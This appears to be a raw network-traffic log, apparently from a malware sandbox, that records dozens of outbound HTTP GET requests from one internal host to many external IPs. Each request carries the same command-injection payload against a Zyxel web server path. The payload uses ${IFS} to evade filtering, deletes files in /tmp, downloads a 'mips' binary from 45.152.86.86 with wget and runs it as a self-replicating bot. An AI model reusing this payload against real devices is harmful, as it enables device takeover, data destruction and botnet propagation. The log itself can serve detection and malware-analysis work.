                              Mar 31, 2024 08:41:51.131784916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6846192.168.2.1358232199.9.93.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131823063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6847192.168.2.1344268150.158.71.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131856918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6848192.168.2.1347476107.172.104.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131889105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6849192.168.2.1347032160.219.197.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131942034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6850192.168.2.133560275.59.141.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.131968975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6851192.168.2.134964083.17.30.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132011890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6852192.168.2.1341490160.37.124.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132039070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6853192.168.2.135799040.236.190.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132097006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6854192.168.2.1356798149.232.119.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132144928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6855192.168.2.135936488.31.235.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132174015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6856192.168.2.1335046200.157.147.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132211924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6857192.168.2.133365275.215.21.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132266998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6858192.168.2.1345612126.66.69.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132313013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6859192.168.2.134527262.212.52.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132339954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6860192.168.2.135207297.46.138.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132383108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6861192.168.2.135362449.13.246.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132426023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6862192.168.2.133342432.219.197.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132461071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6863192.168.2.1338026108.85.170.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132484913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6864192.168.2.134914234.173.171.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132534027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6865192.168.2.1356392125.165.223.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132576942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6866192.168.2.133694813.124.139.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132627010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6867192.168.2.1347728197.50.89.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132661104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6868192.168.2.1348268100.39.107.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132707119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6869192.168.2.1344968132.105.24.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132740021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6870192.168.2.1344520135.36.20.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132805109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6871192.168.2.1347538177.125.168.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132838011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6872192.168.2.133592895.116.169.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132884979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6873192.168.2.1357776155.236.111.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132924080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6874192.168.2.1356694106.117.102.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.132970095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6875192.168.2.135610427.20.235.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133024931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6876192.168.2.135797468.143.222.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133049011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6877192.168.2.1358398159.169.209.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133100033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6878192.168.2.1339928101.252.128.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133150101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6879192.168.2.13590245.127.248.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133209944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6880192.168.2.1335946113.69.105.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133240938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6881192.168.2.1353448195.242.213.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133281946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6882192.168.2.1355148104.19.208.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133317947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6883192.168.2.1340532118.182.142.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133347988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6884192.168.2.1357176199.197.77.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133393049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6885192.168.2.135498889.56.114.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133440018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6886192.168.2.1347426211.49.161.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133492947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6887192.168.2.133731859.239.239.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133524895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6888192.168.2.1344070197.200.87.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133550882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6889192.168.2.1343324200.29.129.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133594036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6890192.168.2.1359336162.13.127.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133632898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6891192.168.2.1335004134.197.80.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133681059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6892192.168.2.1354338176.152.210.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133724928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6893192.168.2.1359514123.142.164.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133774042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6894192.168.2.1355988157.18.73.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133800030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6895192.168.2.134057661.213.96.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133850098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6896192.168.2.135284282.87.59.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133891106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6897192.168.2.1338138103.242.68.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133929014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6898192.168.2.134119667.135.252.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.133979082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6899192.168.2.1350192149.173.143.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134032965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6900192.168.2.1338576128.175.8.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134077072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6901192.168.2.1353498129.98.219.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134115934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6902192.168.2.1355538216.17.114.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134160042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6903192.168.2.1338572131.193.64.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134190083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6904192.168.2.1350752202.93.198.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134246111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6905192.168.2.133705019.146.96.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134283066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6906192.168.2.1343960163.99.178.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134301901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6907192.168.2.136089848.179.79.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134394884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6908192.168.2.134128089.18.179.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134423018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6909192.168.2.135091294.110.210.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134481907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6910192.168.2.1350386149.67.221.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134526968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6911192.168.2.1341326213.18.107.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134572983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6912192.168.2.1346130197.147.6.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134619951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6913192.168.2.135896036.120.56.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.134676933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6914192.168.2.134512668.35.202.197443
                              TimestampBytes transferredDirectionData
